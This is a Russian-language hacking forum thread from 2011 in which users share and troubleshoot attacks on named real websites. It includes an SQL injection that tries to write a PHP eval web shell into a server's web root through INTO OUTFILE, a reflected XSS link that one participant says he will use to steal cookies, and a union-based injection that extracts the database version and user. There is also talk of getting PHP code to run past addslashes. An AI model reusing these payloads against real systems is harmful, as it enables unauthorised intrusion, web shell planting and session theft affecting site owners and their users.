ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
21.10.2011, 22:01
|
|
Новичок
Регистрация: 25.07.2009
Сообщений: 10
Провел на форуме:
71531
Репутация:
0
|
|
Что неправильно делаю? file_priv=y
Код:
Code:
http://wifi.hm-ugratel.ru/?m[admin]&id=',''and(select(1)from(select(count(*)),(concat((select(0x2533433F7068702532306576616C28245F524551554553545B636D645D293B25)/**/from/**/fontan.mp_gw_auth/**/into/**/outfile/**/0x2F7372762F7777772F76686F7374732F7567726174656C2E72752F7368656C6C),0x00,floor(rand(0)*2)))x/**/from(information_schema.tables)group/**/by(x))a)and'
|
|
|
21.10.2011, 22:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от z0mbie86
z0mbie86 said:
Что неправильно делаю? file_priv=y
Код:
Code:
http://wifi.hm-ugratel.ru/?m[admin]&id=',''and(select(1)from(select(count(*)),(concat((select(0x2533433F7068702532306576616C28245F524551554553545B636D645D293B25)/**/from/**/fontan.mp_gw_auth/**/into/**/outfile/**/0x2F7372762F7777772F76686F7374732F7567726174656C2E72752F7368656C6C),0x00,floor(rand(0)*2)))x/**/from(information_schema.tables)group/**/by(x))a)and'
Код:
Code:
outfile/**/0x2F7372762F7777772F76686F7374732F7567726174656C2E72752F7368656C6C)
Хекс не прокатит с OUTFILE.
Есть вариант со встроенными запросами.
|
|
|
|
21.10.2011, 22:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от =Zeus=
=Zeus= said:
Добрый вечер. Интересует, что можно сделать с этим сайтом. Проблема в том что я нашел лишь одну php-страничку. Даже кавычку подставить некуда. Не понятно так же, что за движок (походу самописный). Сканил структуру сайта меднет-сканнером - тоже ничего интересного.
Все что я смог это получить раскрытие путей, подпортив кукисы.
Буду благодарен за любую инфу, которая может помочь.
Ну, судя по страничке, там в коде выполняется print_r($_REQUEST);
XSS:
http://marafet.net/include/ajax/modules/gallery/voteImage.php?a=%3Cscript%3Ealert(1)%3C/script%3E
|
|
|
|
21.10.2011, 22:38
|
|
Участник форума
Регистрация: 10.08.2009
Сообщений: 238
Провел на форуме:
724939
Репутация:
108
|
|
Сообщение от Boolean
Boolean said:
Ну, судя по страничке, там в коде выполняется print_r($_REQUEST);
XSS:
http://marafet.net/include/ajax/modules/gallery/voteImage.php?a=%3Cscript%3Ealert(1)%3C/script%3E
Спасибо большое, на крайняк хоть кукисы утяну.
|
|
|
|
21.10.2011, 23:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
почистил по просьбе.
|
|
|
|
21.10.2011, 23:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Версию и юзера вывел
http://protein.7910.org/product_info.php/products_id/125'and(select*from(select(name_const(concat_ws(0x 3a,version(),user()),1)),name_const(concat_ws(0x3a ,version(),user()),1))a)and'
Как щас вывести таблицы из information_schema.tables, какой должен быть запрос?
|
|
|
|
21.10.2011, 23:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от er9j6@
er9j6@ said:
Версию и юзера вывел
http://protein.7910.org/product_info.php/products_id/125'and(select*from(select(name_const(concat_ws(0x 3a,version(),user()),1)),name_const(concat_ws(0x3a ,version(),user()),1))a)and'
Как щас вывести таблицы из information_schema.tables, какой должен быть запрос?
Зачем пытаться проводить инъекцию как в Insert запросах, тем самым усложняя себе жизнь?
Что мешало сделать просто вот так:
http://protein.7910.org/product_info.php/products_id/126'%20and%201=3%20union%20select%201,2,3,4,concat _ws(0x3a,version(),database(),user()),6,7,8,9,10,1 1,12,13,14,15,16%20--%20
?)
|
|
|
|
22.10.2011, 13:47
|
|
Познающий
Регистрация: 20.04.2006
Сообщений: 67
Провел на форуме:
170762
Репутация:
-1
|
|
есть ли способ выполнить не sql запрос а php код внутри кавычек
к примеру такой вариант
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
создаеться файл TEST.PHP с профильтрованным содержимым id |
|
|
|
22.10.2011, 15:54
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от ysmat
ysmat said:
есть ли способ выполнить не sql запрос а php код внутри кавычек
к примеру такой вариант
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
создаеться файл TEST.PHP с профильтрованным содержимым id да возможно, так как функция addslashes(); добовляет слешь к ковычкам, а в пхп элементарно даже можно выполнить , вопрос следущий, куда здесь добавиться слешь))
|
|
|
|
22.10.2011, 17:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от winstrool
winstrool said:
да возможно, так как функция addslashes(); добовляет слешь к ковычкам, а в пхп элементарно даже можно выполнить , вопрос следущий, куда здесь добавиться слешь))
Вообще-то как-такового варианта обхода нет.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
